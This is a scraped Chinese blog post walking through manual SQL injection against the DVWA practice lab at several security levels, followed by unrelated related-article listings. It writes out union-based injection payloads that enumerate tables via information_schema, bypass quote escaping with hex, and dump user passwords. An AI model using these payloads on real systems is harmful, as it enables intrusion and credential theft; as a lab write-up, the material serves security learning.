mysql下拉框回显_SQL回显

最新推荐文章于 2023-05-16 11:29:57 发布
最新推荐文章于 2023-05-16 11:29:57 发布
阅读量159 收藏
点赞数
文章标签: mysql下拉框回显
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29063681/article/details/113600676
版权

DVWA-SQL注入

DVWA是一个基于PHP和MySQL开发的漏洞测试平台

测试环境

应用程序: phpStudy(apache,php,mysql)

测试程序: firefox, new hacker, burpsuite,sqlmap,中国菜刀

一、        SQL注入

SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到恶意SQL语句的目的。

二、手工注入常规思路

1.判断是否存在注入,注入是字符型还是数字型

2.猜解SQL查询语句中的字段数

3.确定回显位置

4.获取当前数据库

5.获取数据库中的表

6.获取表中的字段名

7.得到数据

三、DVWA注入分析

先将DVWA的级别设置为LOW

1.分析源码,可以看到没有对参数做任何的过滤,直接带入数据库进行查询,分析sql查询语句,可能存在字符型sq1注入

20200212124306196986.png

20200212124306303436.png

20200212124306608135.png

2.判断sql是否存在注入,以及注入的类型。1’and’1’=’1

20200212124306903068.png

3.猜测SQL查询语句中的字段数,1’order  by  1#

20200212124307302498.png

1’order  by  2#

20200212124307653097.png

1’order  by  3#

20200212124308280074.png

从上面两个图可以看出,SQL语句查询的表字段数是2,确定显示的位置(SQL语句查询之后的回显位置)

1’union select  1,2#从下图中可以看到有两个回显

20200212124308570124.png

查询当前的数据库,以及版本

1’union select  version(),database() #

20200212124308816228.png

获取数据库中的表,1’union select  1,group_concat(table_name) from information_schema.tables where table_schema=database ()#

20200212124309086746.png

20200212124309376796.png

获取表中的字段名,1’union  select  1,group_concat(column_name) from information_schema.columns where table_name=’users’#

20200212124309937364.png

20200212124310251830.png

获取字段中的数据,1’union  select  user,password from users#

20200212124310621961.png

20200212124310991116.png

将DVWA的级别设置为Medium

20200212124311221593.png

中级加入了一些防御,不让用户输入,只提供选择(可用burpsuit抓包来绕过),分析源码可以看到对参数的使用mysql_real_escape_string函数转义sql语句中的一些特殊字符,查看sql查询语句可以看出可能存在数字型sql注入。

20200212124311410077.png

20200212124311590748.png

通过burpsuit抓包,修改数据包,绕过防御。判断注入点,以及注入的类型,下图可以看到,存在注入,注入类型是数字型注入。1 and 1=1#

20200212124311945254.png

猜解sql查询语句中的字段的个数,测试字段个数1,1 order by

1#

20200212124312298783.png

测试字段个数2,1 order by 2#

20200212124312626921.png

测试字段个数3,1 order by 3#。返回错误页面, 所以字段数为2

20200212124313021467.png

确定回显的位置,下图可以说明有2个回显位置,1 union select 1,2#

20200212124313350581.png

获取当前数据库的名称以及版本,

union select database(), version()#

20200212124313672859.png

获取数据库中的所有表,1 union select 1, group_ concat (table_ name) frominformation_ schema. tables where table_ schema=database()#

20200212124314023459.png

获取表中的所有字段名,考虑到单引号被转义,可以利用16 进制进行绕过。1union select 1, group_ concat (column_ name) from information_ schema. col umnswhere table_ name=0x7573657273#

20200212124314517618.png

获取字段中的数据,1union se lect user, password from users#

20200212124314816458.png

将DVWA的级别设置为High

将dvwa设置为高级,可以看出,点击”here to change your ID”,页面自动跳转,防御了自动化的SQL注入,分析源码可以看到,对参数没有做防御,在sql查询语句中限制了查询条数,可以通过burpsuit抓包,修改数据包实现绕过。

20200212124315179753.png

20200212124315377026.png

点开链接显示下图

20200212124315666100.png

发送1

20200212124315929782.png

查看源码

20200212124316204207.png

获得密码,1’ union select user, password from users#

20200212124316562619.png

20200212124316787237.png

20200212124317098772.png

20200212124317464997.png

将DVWA的级别设置为Impossible,分析源码可以看到使用了PD0技术,杜绝了SQL注入。

20200212124317789228.png

20200212124317968923.png

黄姑
关注
【网络安全】SQL注入详细分析
你在看屏幕的同时,屏幕也在注视着你
04-06 6045
SQL注入**超详**
mysql系统数据表如何_Mysql-5-数据表的基本操作
weixin_29190651的博客
01-28 305
1.创建表:之前需要use database database_name 然后create table 表名();例:创建员工表tb_employee1,结构如下表所示字段名称数据类型备注idint(11)员工编号namevarchar(25)员工名称depldint(11)所在部门编号salaryfloat工资mysql> create databaseaa;mysql> useaa...
C#,Winfrom中下拉框链接Sql Sever创建创建新行的关键代码
qq_54774521的博客
09-17 281
实现步骤: 将值传送到下拉框 1.建立DataSet对象(临时数据库) 2.写出sql语句链接数据库 3.创建SqlDataAdapter对象(是临时仓库和数据库的运输车) 4.填充dataset临时仓库(运输车SqlDataAdapter的对象卸货) 5.添加新行,新行数下标-1 6.将dataSet的值传到下拉框中.用InserAt给下标位置(是给临时仓库里的货物里编号位置) 7.确认下拉框的数据源是...
select下拉框带模糊查询_SQL 之 简单查询
weixin_39812577的博客
12-06 1283
学习目标1.基本的查询语句2.指定查询条件3.注释和SQL语句注意事项4.运算符5.字符串模糊查询一. 基本的查询语句我们通过向数据库发送SQL查询语句,数据库里运行SQL语句,将查询结果返。最基本的查询语句包括两个子句:SELECT子句,FROM子句。子句是SQL语句的组成要素,是五个以关键字作为开始的语句。从student表中查找姓名,学号两列数据SELECT 姓名, 学号 FROM stu...
mysql下拉选择框_动态选择select下拉框(Mysql数据库)
weixin_42531925的博客
01-18 934
Mysql数据库动态选择select下拉框基于JFinal,jstl,Html页面选择区域${lli.qname}Controller/*** 跳转添加页*/public void userAddPage(){PageUtil pageUtil = nsUserService.userGetQy();setAttr("pageUtil",pageUtil);renderJsp("/nsuser/n...
mysql系统数据表如何_从mysql数据库中数据
weixin_39520013的博客
01-19 201
希望这个帮助$data=array();$data[] = array("chapter" => "2", "subchapter" => "2.1", "part" => "1" );$data[] = array("chapter" => "2", "sub...
mysql下拉框,当从MySQL数据库使用下拉框示一行中的多个值
weixin_31614235的博客
01-20 190
I'm trying to show a specific item in the row when an item in the dropdown list is selected.To clarify, lets say I have item1 chosen in the dropdown menu, and when item1 is chosen, I want price for it...
mysql_SQL
weixin_34205814的博客
01-20 1327
DVWA-SQL注入DVWA是一个基于PHP和MySQL开发的漏洞测试平台测试环境应用程序: phpStudy(apache,php,mysql)测试程序: firefox, new hacker, burpsuite,sqlmap,中国菜刀一、 SQL注入SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到恶意SQL语句的目的。二、手工注入常规思路1.判...
select下拉框
eRunn
02-24 9244
 时总是某一特定的选项,只需将时select的value设置成对应值就可以,例如下面例子我给select的value值设置为3,对应选项就是ccc。 <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title></title>
一个省市县三级联动的(带数据库)
han73748196的博客
06-18 1万+
不废话,上代码! 大神 勿喷!!!<!--JSP代码--> <tr> <td>地址:</td> <!--第一级:省 --> <td><select id="province" name="province" onchange="f1()"> <option>
select下拉框之数据
热门推荐
飞火龙在天的博客
03-15 2万+
估计这是最简单的一种方法了 setTimeout("$('select#menuLevel').val('${menuLevel}')", 100);
mysql下拉框_thymeleaf下拉框从后台动态选中
weixin_36125588的博客
02-07 168
请选择供th:each="supplier : ${insuranceInfoDto.upiInsuranceSupplierDtoList}"th:value="${supplier.supplierCode}" th:text="${supplier.supplierName}">说明1:th:each、th:value、th:text代码部分为下拉框数据。说明2:th:select...
mysql系统数据表如何,如何从数据库表行(PHP)
weixin_31162247的博客
01-19 153
i want to echo out everything from a particular query. If echo $res I only get one of the strings. If I change the 2nd mysql_result argument I can get the 2nd, 2rd etc but what I want is all of them...
mysql下拉选择框_从MySQL生成下拉列表
weixin_39670511的博客
01-18 420
I need to generate a drop down menu from data in a MySQL table.From the table, it'll have to take the user id and the username.Then it'll set the user id to option value and the username to what shows...
sql语句和下拉框实现
最新发布
m0_51170293的博客
05-16 716
Ajax从后台获取到的结果返到id值为这个,append再追加 达成下拉框的效果。update 表名 set id=#{id} name=#{name}select * from 表格 where id=#{id}delete from 表 where id=#{id}插入更新: put post。request 都可以代替。
下拉框
帅气Dee海绵宝宝
11-27 342
引入jstl &lt;%@taglib uri="http://java.sun.com/jsp/jstl/core" prefix="c"%&gt;  下拉框 &lt;select name="queryMySelect" class="texts"&gt; &lt;option value="3" &lt;c:if test="${
Java中使用Select标签绑定下拉框以及通过选中下拉框内容动态
weixin_42271651的博客
06-01 4417
Java中绑定下拉框以及通过选中下拉框内容动态MySql里数据库里的表格 思路:选择下拉框内容,动态填旁边的表格数据: 效果图: 注意看路径,别把路径写错了; JDBC的配置前面的博客里有说到,在这里就不写了。 下面是代码部分: 主要组成部分:一个servlet、一个Jsp、一个po类、一个dao、一个dao实现类、一个service、一个service...
mysql下拉选择框_jQuery+PHP+MySQL实现无限级联下拉框效果
weixin_30972263的博客
01-18 213
本文简单实现jQuery无限级联效果,分享给大家供大家参考,具体内容如下效果图:图1 仅下拉框图2 层级提示+下拉框图3 存储数据点击响应主要包含3个文件:index.html(主页),wuxianjilian.php(数据处理),wuxianjilian.sql(MySQL数据文件)1. index.html无限级联$(document).ready(function(){var getData...
下拉框查询
qq_52010333的博客
09-16 1015
文章目录前言一、简单粗暴类(不推荐)1.效果2.代码二、c标签类实现(推荐)1.效果2.视频表与视频类型表3. (主要)添加页面下拉框4. (主要)修改页面下拉框 前言 一、简单粗暴类(不推荐) 1.效果 2.代码 <td>负责教师</td> <td> <select id="" name="trueName" style="width:180px;heigh
一条SQL实现下拉框自动加载"所有"
die3088的博客
05-13 244
select ID,name from c_Table1 union select '' as ID,'所有' as name from c_Table1 转载于:https://www.cnblogs.com/zjhhz17909/archive/2010/05/13/1734526.html
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值